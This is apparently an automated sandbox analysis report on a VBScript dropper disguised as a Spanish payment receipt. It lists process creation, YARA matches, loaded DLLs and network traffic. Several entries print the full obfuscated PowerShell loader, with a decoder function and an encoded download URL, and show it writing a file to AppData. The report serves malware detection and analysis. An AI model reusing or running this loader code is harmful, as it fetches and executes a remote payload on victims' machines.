Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 142.250.101.138:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.10:49706 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7420.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7247
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7247Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNatur
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturJump to behavior
Source: JUSTIFICANTE DE PAGO.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_7420.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Trangstilflde.PerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cadvkh4.xq1.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: JUSTIFICANTE DE PAGO.vbsVirustotal: Detection: 9%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNatur
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
